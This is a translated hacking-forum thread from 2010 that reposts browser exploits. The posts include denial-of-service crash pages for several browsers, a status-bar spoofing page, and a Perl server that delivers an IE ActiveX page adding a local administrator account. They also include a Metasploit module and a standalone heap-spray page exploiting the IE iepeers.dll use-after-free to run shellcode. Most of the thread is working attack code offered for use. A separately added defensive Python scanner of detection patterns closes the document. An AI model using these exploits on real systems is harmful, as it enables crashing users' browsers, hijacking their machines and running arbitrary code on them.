Antichat is available again.
The Antichat forum is back and open to users once more.
Security, programming, technology and much more are discussed here.
The community is gathering together again.
New address: forum.antichat.xyz
23.03.2010, 23:43
Forum member, registered 11.10.2009, 116 posts, time on forum 472147, reputation 211
Browser vulnerabilities
Firefox 3.5 unicode stack overflow. Andrew Haynes , Simon Berry-Byrne
Code:
<html>
<head>
<script language="JavaScript" type="Text/Javascript">
var str = unescape("%u4141䅁");
var str2 = unescape("");
var finalstr2 = mul8(str2, 49000000);
var finalstr = mul8(str, 21000000);
document.write(finalstr2);
document.write(finalstr);
function mul8 (str, num) {
var i = Math.ceil(Math.log(num) / Math.LN2),
res = str;
do {
res += res;
} while (0 < --i);
return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>
# milw0rm.com [2009-07-15]
Added 12 minutes later
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
Code:
# EDB-ID: 11432
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Asheesh kumar Mani Tripathi
# Published: 2010-02-13
# Verified: yes
=======================================================================
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company aksitservices
# Credit by Asheesh Anaconda
#Download www.mozilla.com/firefox
#Background
Mozilla Firefox is a popular internet browser. .....:)
#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists when the attacker puts the window.print() function
in a multitudinous loop. User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
========================================================================================================================
asheesh.html
========================================================================================================================
<html>
<title>asheesh kumar mani tripathi</title>
<script>
function
asheesh()
{
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
}
asheesh();
</script>
</html>
========================================================================================================================
#If you have any questions, comments, or concerns, feel free to contact me.
Added 42 minutes later
Mozilla Firefox <= 3.6 Denial Of Service Exploit
Code:
# EDB-ID: 11590
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Ale46
# Published: 2010-02-27
# Verified: yes
<?php
/*
* Title: Mozilla Firefox <=3.6 - Remote Denial Of Service Exploit
* Date: 25/02/10
* Author: Ale46 - ale46[at]paranoici[dot]org
* Software Link: http://www.mozilla-europe.org/en/firefox/
* Version: 3.6 and 3.5.8 are vulnerable so I think that all versions <= 3.6 have the same issue
* Tested on: Windows 7 x32\x64 - Ubuntu 9.10 x32
* Description: visiting this php page you'll get an instant crash of Firefox
* Greetz: Gandalf
* Extra Greetz: University of Palermo and its fantastics rules for the Computer Engineering degree (how beautiful 's irony)
*/
$a = '<marquee>';
$b = '</marquee>';
for ($i=0;$i<=1000;$i++){
$a .= '<marquee>';
$b .= '</marquee>';
}
echo '<body>';
echo $a;
echo "hadouken!";
echo $b;
echo '</body>';
?>
Opera 10.10 Status Bar Obfuscation
Code:
<center><h1>Opera 10.10 Status Bar Obfuscation</h1>
<br>
<strong>Author : 599eme Man.<br >
Contact : flouf@live.fr</strong><br >
_______________________________________________________________________
<br>
<br>
<br>
Click on google (look the Status bar) and you'll be redirect on Yahoo<br><strong><h1><a onclick="javascript:OB();" href="http://www.Google.com">http://www.Google.com</a></h1></strong></center>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<font style="font-family:arial;font-size:32px">Look Here<br>
| <br>
V
<script>
function OB() {
document.write('');
document.location='http://yahoo.com';
}
</script>
Last edited by 547; 23.03.2010 at 23:51.
28.05.2010, 13:36
Newbie, registered 01.01.2009, 27 posts, time on forum 125085, reputation 31
Cross Site URL Hijacking by using Error Object in Mozilla Firefox
XSUH attacks are used to steal the URL of another website. That URL can reveal the client's status on that site, and it may contain confidential information such as a session identifier and the like.
As you know, the error-handling scripts in Mozilla Firefox are very useful for developers: they can show the exact source of an error and other helpful information. Now this feature can be used to steal the URL after a redirect (an XSUH attack), which can lead to leakage of confidential information.
The attack technique itself is described here [eng]
A small example
Tested on Mozilla Firefox 3.6.3, 3.5.9, 3.6.4 build 5 (26.05.2010).
===================================
All browsers 0day Crash Exploit (2)
===================================
Code:
<html>
<head>
<meta http-equiv="Refresh" content="999999999999999999999999999999999999">
<title>Crasher</title></head>
<html>
<body bgcolor="black">
<center>
<font color="red">
<br>
<br>
<br>
<br>
<script language="javascript">
now=new Date();
document.write(now+"<br>");
h=now.getHours();
m=now.getMinutes();
s=now.getSeconds();
document.write("<font size='+5'>");
for (i =0;i<99999999999999999;i++) {
document.write('<html><marquee><h1>'+h+":"+m+":"+s);
}
alert('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
</script>
</center>
</font>
</body>
</html>
Last edited by lzr; 28.05.2010 at 17:11.
29.05.2010, 14:27
Newbie, registered 01.01.2009, 27 posts, time on forum 125085, reputation 31
======================================================================
Google Chrome 4.1.249.1064 Remote Memory Corrupt (Local Crash Exploit)
======================================================================
Save this script with extension .html or .htm
Then open with Google Chrome web browser
THIS IS FOR EDUCATIONAL PURPOSES ONLY
AUTHOR WILL NOT BE RESPONSIBLE FOR ANY DAMAGE
Webpage display issues: "Aw, Snap!"
Issue: You may see the "Aw, Snap!" message if a webpage crashes unexpectedly.
Tested on: WINXP (sp2 - sp3) - WIN 7
Affected: Google Chrome version 4.1.249.1064 and Prior
Author: eidelweiss
Contact: eidelweiss[at]cyberservices[dot]com OR g1xsystem[at]windowslive.com
Greets: [D]eal [c]yber and All Indonesian Hacker`s
Code:
<body onload="javascript:DoS();"></body>
<script>
function DoS() {
var buffer = '\x41';
for (i =0;i<666;i++) {
buffer+=buffer+'\x41';
document.write('<html><marquee><h1>'+buffer+buffer);
}
}
</script>
===================================================
Google Chrome acronym tag denial of service exploit
===================================================
Code:
<html>
<title>Google Chrome remote stack overflow in chrome.dll; published at http://h.ackack.net; found by: Jelmer de Hen</title>
<head>
<script>
// Open it a couple of times, it might not always work; see http://h.ackack.net/?p=323 for more information
function pataboom(){
while(1){
document.write("<acronym>");
}
}
</script>
</head>
<body onload="pataboom();"></body>
</html>
==============================================================
Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Service
==============================================================
Code:
<?php
# Canvas tag DoS Mozilla firefox 3.6.3
# Canvas tag DoS Safari 4.0.5 (TESTED)
# Canvas tag DoS Google Chrome 4.1
# Canvas tag DoS Opera 10.52
# Canvas tag DoS Internet Explorer 6.0 & 8.0 (TESTED)
#
# Found by Jelmer de Hen
# published at http://h.ackack.net/?p=269
# OS: Windows XP SP3
# Mozilla Firefox 3.6.3
echo "<html><body>";
while (1){
echo "<canvas>";
}
echo "</body>";
echo "</html>";
?>
Multiple Browsers Audio Tag Denial of Service Vulnerability
Code:
#!/usr/bin/python
#Multiple Browsers Audio Tag Denial of Service Vulnerability
#any ogg file can be used for the DoS as long as it is a valid file on the server
#crash reporter for Mac seems to think this is a EXEC_BAD_ACCESS
#This script acts as a web server to DoS connecting clients
# Exploit Title: Multiple Browsers Audio Tag DoS Vulnerability
# Date: April 21th, 2010
# Author: Chase Higgins, http://twitter.com/tzDev
# Software Link: google.com/chrome, apple.com/safari
# Version: Google Chrome 5.0.375.9 dev
# Tested on: Mac OSX 10.5.8
import sys, socket
def main():
    html = """
<html>
<body>
"""
    html += "<audio src='myogg.ogg'>" * 10000
    html += """
</body>
</html>
"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('', 2121))
    s.listen(1)
    while True:
        channel, details = s.accept()
        print channel.recv(256)
        channel.send(html)
        channel.close()
main()
30.05.2010, 19:39
Newbie, registered 01.01.2009, 27 posts, time on forum 125085, reputation 31
Internet Explorer ( 6/7) Remote Code Execution -Remote User Add Exploit
Code:
#!/usr/bin/perl
use strict;
use Socket;
use IO::Socket;
print "\n";
print "800008 8 \n";
print "8 e eeeee eeeeeee eeeee 8 eeeee eeeee eeeee\n";
print "8eeeee 8 8 88 8 8 8 8 8 8e 8 8 8 8 8 | \n";
print " 88 8e 8 8 8e 8 8 8eee8 88 8eee8 8eee8e 8eeee \n";
print "e 88 88 8 8 88 8 8 88 8 88 88 8 88 8 88 \n";
print "8eee88 88 8eee8 88 8 8 88 8 88eee 88 8 88eee8 8ee88 \n";
print "-----------------------------------------------------------\n";
print " Useage : $0 Port \n";
print " Please Read the Instruction befor you use this \n";
print " ---------------------------------\n";
sub parse_form {
my $data = $_[0];
my %data;
foreach (split /&/, $data) {
my ($key, $val) = split /=/;
$val =~ s/\+/ /g;
$val =~ s/%(..)/chr(hex($1))/eg;
$data{$key} = $val;}
return %data; }
my $port = shift;
defined($port) or die "Usage: $0 Port \n";
mkdir("public_html", 0777) || print $!;
my $DOCUMENT_ROOT = $ENV{'HOME'} . "/public_html";
print " [+] Account Name : "; chomp(my $acc=<STDIN>);
print " [+] Account Password : "; chomp(my $pass=<STDIN>);
print " [+] Your IP : "; chomp (my $ip=<STDIN>);
#------------- Exploit -----------------
my $iexplt= "public_html/index.html";
open (myfile, ">>$iexplt");
print myfile "<html>\n";
print myfile "<title> IE User Add Test </title>\n";
print myfile "<head>";
print myfile "</font></b></p>\n";
print myfile "<p>\n";
print myfile "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='exploit'\n";
print myfile "></object>\n";
print myfile "<script language='vbscript'>\n";
print myfile "adduser=";
print myfile '"cmd';
print myfile " /c net user $acc $pass /add && net localgroup Administrators $acc ";
print myfile '/add"';
print myfile "\n";
print myfile "exploit.run adduser \n";
print myfile "\n </script></p>\n";
print " [+] ----------------------------------------\n";
print " [-] Link Genetrated : http://$ip:$port/index.html\n";
close (myfile);
#------------------------------------
my $server = new IO::Socket::INET(Proto => 'tcp',
LocalPort => $port,
Listen => SOMAXCONN,
Reuse => 1);
$server or die "Unable to create server socket: $!" ;
while (my $client = $server->accept()) {
$client->autoflush(1);
my %request = ();
my %data;
{
local $/ = Socket::CRLF;
while (<$client>) {
chomp;
if (/\s*(\w+)\s*([^\s]+)\s*HTTP\/(\d.\d)/) {
$request{METHOD} = uc $1;
$request{URL} = $2;
$request{HTTP_VERSION} = $3;
}
elsif (/:/) {
(my $type, my $val) = split /:/, $_, 2;
$type =~ s/^\s+//;
foreach ($type, $val) {
s/^\s+//;
s/\s+$//;
}
$request{lc $type} = $val;
}
elsif (/^$/) {
read($client, $request{CONTENT}, $request{'content-length'})
if defined $request{'content-length'};
last;
}
}
}
if ($request{METHOD} eq 'GET') {
if ($request{URL} =~ /(.*)\?(.*)/) {
$request{URL} = $1;
$request{CONTENT} = $2;
%data = parse_form($request{CONTENT});
} else {
%data = ();
}
$data{"_method"} = "GET";
} elsif ($request{METHOD} eq 'POST') {
%data = parse_form($request{CONTENT});
$data{"_method"} = "POST";
} else {
$data{"_method"} = "ERROR";
}
my $localfile = $DOCUMENT_ROOT.$request{URL};
if (open(FILE, "<$localfile")) {
print $client "HTTP/1.0 200 OK", Socket::CRLF;
print $client "Content-type: text/html", Socket::CRLF;
print $client Socket::CRLF;
my $buffer;
while (read(FILE, $buffer, 4096)) {
print $client $buffer;
}
$data{"_status"} = "200";
}
else {
print $client "HTTP/1.0 404 Not Found", Socket::CRLF;
print $client Socket::CRLF;
print $client "<html><body>404 Not Found</body></html>";
$data{"_status"} = "404";
}
close(FILE);
print ($DOCUMENT_ROOT.$request{URL},"\n");
foreach (keys(%data)) {
print (" $_ = $data{$_}\n"); }
close $client;
# Sioma Labs
# http://siomalabs.com
# Sioma Agent 154
}
0-day exploit for Internet Explorer
description: http://garwarner.blogspot.com/2010/0...f-band-ie.html
exploits:
1
Code:
##
# $Id: ie_iepeers_pointer.rb 8779 2010-03-11 05:49:14Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

##
# ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer iepeers.dll Use After Free',
'Description' => %q{
This module exploits a use-after-free vulnerability within iepeers.dll of
Microsoft Internet Explorer versions 6 and 7.

NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # original discovery
'Trancer <mtrancer[at]gmail.com>', # metasploit module
'jduck' # minor cleanups
],
'Version' => '$Revision: 8779 $',
'References' =>
[
[ 'CVE', '2010-0806' ],
[ 'OSVDB', '62810' ],
[ 'BID', '38615' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end

def on_request_uri(cli, request)

# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)

# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

# Set the return\nops
ret = Rex::Text.to_unescape([target.ret].pack('V'))

# Randomize the javascript variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_array = rand_text_alpha(rand(100) + 1)
j_function1 = rand_text_alpha(rand(100) + 1)
j_function2 = rand_text_alpha(rand(100) + 1)
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)

# Build out the message
html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}(){
#{j_function1}();
var #{j_object} = document.createElement('body');
#{j_object}.addBehavior('#default#userData');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute('s',window);
}
} catch(e){ }
window.status+='';
}

document.getElementById('#{j_id}').onclick();
</script></body></html>
|

print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })

# Handle the payload
handler(cli)

end

end
2
Code:
<html>
<body>
<button id="helloworld" onclick="blkjbdkjb();" STYLE="DISPLAY:NONE"></button>
<script language="JavaScript" src="bypasskav.txt">
</script>
<script language="JavaScript">
function eejeefe() {
var s=unescape("%u0c0c");
var u=unescape("%u0c0c");
var c=s+u;var array = new Array();
var ls = 0x86000-(c.length*2);
var b = unescape("%u0c0c%u0c0C");
while(b.length<ls/2){b+=b;
}
var lh = b.substring(0,ls/2);
delete b;for(i=0;i<270;i++) {
array[i] = lh + lh + c;
}
}
function blkjbdkjb() {
eejeefe();
var sdfsfsdf = document.createElement("BODY");
sdfsfsdf.addBehavior("#default#userData");
document.appendChild(sdfsfsdf);
try {
for (i=0;i<10;i++) {
sdfsfsdf.setAttribute('s',window);
}
}
catch(e) {}
window.status+='';
}
document.getElementById("helloworld").onclick();
</script>
</body>
</html>
3
Code:
# Title: Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
# EDB-ID: 11683
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Trancer
# Published: 2010-03-10
# Verified: yes
##
# ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/in...-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Internet Explorer iepeers.dll use-after-free',
'Description' => %q{
This module exploits a use-after-free vulnerability within iepeers.dll of
Microsoft Internet Explorer versions 6 and 7.
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
},
'License' => MSF_LICENSE,
'Author' => [
'Trancer <mtrancer[at]gmail.com>'
],
'Version' => '$Revision:$',
'References' =>
[
[ 'CVE', '2010-0806' ],
[ 'OSVDB', '62810' ],
[ 'BID', '38615' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([target.ret].pack('V'))
# Randomize the javascript variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_array = rand_text_alpha(rand(100) + 1)
j_function1 = rand_text_alpha(rand(100) + 1)
j_function2 = rand_text_alpha(rand(100) + 1)
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)
# Build out the message
html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}(){
#{j_function1}();
var #{j_object} = document.createElement('body');
#{j_object}.addBehavior('#default#userData');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute('s',window);
}
} catch(e){ }
window.status+='';
}
document.getElementById('#{j_id}').onclick();
</script></body></html>|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end
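As an added defensive example (editor's code, not from the thread or from any of the exploit authors), the Python scanner below flags HTML bodies that carry the hallmarks of the PoCs posted above: the unbounded document.write loops and string doubling (Firefox 3.5 mul8, Chrome 4.1, acronym and canvas), the recursive window.print() and the huge meta-refresh value (Firefox 3.6 and the "Crasher" page), deep marquee nesting and repeated audio tags, the 0x0c0c spray followed by addBehavior('#default#userData') (iepeers.dll), and a scripted ActiveX object with a .run call (IE user-add). The thresholds and the sample inputs are constructed assumptions for a proxy or mail-gateway check, not captured traffic.

```python
import re

# Signatures keyed on hallmarks visible in the PoCs posted in this thread.
# Constructed for this example, not taken from any vendor ruleset.
SIGNATURES = [
    # Firefox 3.5 / Chrome 4.1 / acronym / canvas PoCs: write forever
    ("unbounded document.write loop",
     re.compile(r"(?:while\s*\(\s*1\s*\)|for\s*\([^)]*<\s*\d{9,}[^)]*\))"
                r"\s*\{[^}]*document\.write")),
    # mul8(), buffer+=buffer, nops+=nops: the string doubles every iteration
    ("string doubling inside a loop (exponential growth)",
     re.compile(r"(?:(?:for|while)\s*\([^)]*\)|\bdo\b)\s*\{[^}]*\b(\w+)\s*\+=\s*\1\b")),
    # "Crasher" PoC: absurd refresh interval
    ("huge meta-refresh interval",
     re.compile(r"http-equiv=[\"']?refresh[\"']?\s+content=[\"']?\d{12,}", re.I)),
    # Firefox 3.6 PoC: a function calls window.print() and then itself
    ("recursive function calling window.print()",
     re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{[^}]*window\.print\(\)[^}]*\b\1\s*\(")),
    # iepeers.dll PoCs: 0x0c0c spray followed by the userData behavior
    ("0x0c0c heap spray plus #default#userData behavior",
     re.compile(r"unescape\([\"']%u0c0c.*?addBehavior\([\"']#default#userData", re.I | re.S)),
    # IE user-add PoC: scripted ActiveX object with a .run call
    ("ActiveX object invoked with .run",
     re.compile(r"<object[^>]+classid=[\"']?clsid:[0-9a-f-]{36}.*?\.run\s", re.I | re.S)),
]


def nesting_depth(html, tag):
    """Deepest open-tag nesting of `tag` (the 1000-deep <marquee> PoC output)."""
    depth = peak = 0
    for m in re.finditer(r"<(/?)%s\b" % tag, html, re.I):
        depth = max(depth - 1, 0) if m.group(1) else depth + 1
        peak = max(peak, depth)
    return peak


def scan(html, depth_limit=100, repeat_limit=1000):
    """Return the findings for one captured HTML body; an empty list means clean."""
    findings = [name for name, rx in SIGNATURES if rx.search(html)]
    for tag in ("marquee", "acronym", "canvas"):
        depth = nesting_depth(html, tag)
        if depth > depth_limit:
            findings.append("%s nested %d deep" % (tag, depth))
    audio = len(re.findall(r"<audio\b", html, re.I))  # the audio PoC repeats, not nests
    if audio > repeat_limit:
        findings.append("%d <audio> elements" % audio)
    return findings


# Constructed samples that mimic the hallmarks of the posted PoCs (assumed inputs).
BENIGN = "<html><body><script>for(i=0;i<10;i++){document.write(i);}</script></body></html>"
PRINT_LOOP = ('<script>function again(){window.onerror=new Function("history.go(0)");'
              'window.print();again();}again();</script>')
SPRAY = ('<script>var c=unescape("%u0c0c%u0c0c");while(c.length<0x43000){c+=c;}'
         'var o=document.createElement("BODY");o.addBehavior("#default#userData");</script>')

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("print loop", PRINT_LOOP), ("spray", SPRAY)):
        print(label, "->", scan(body) or "clean")
```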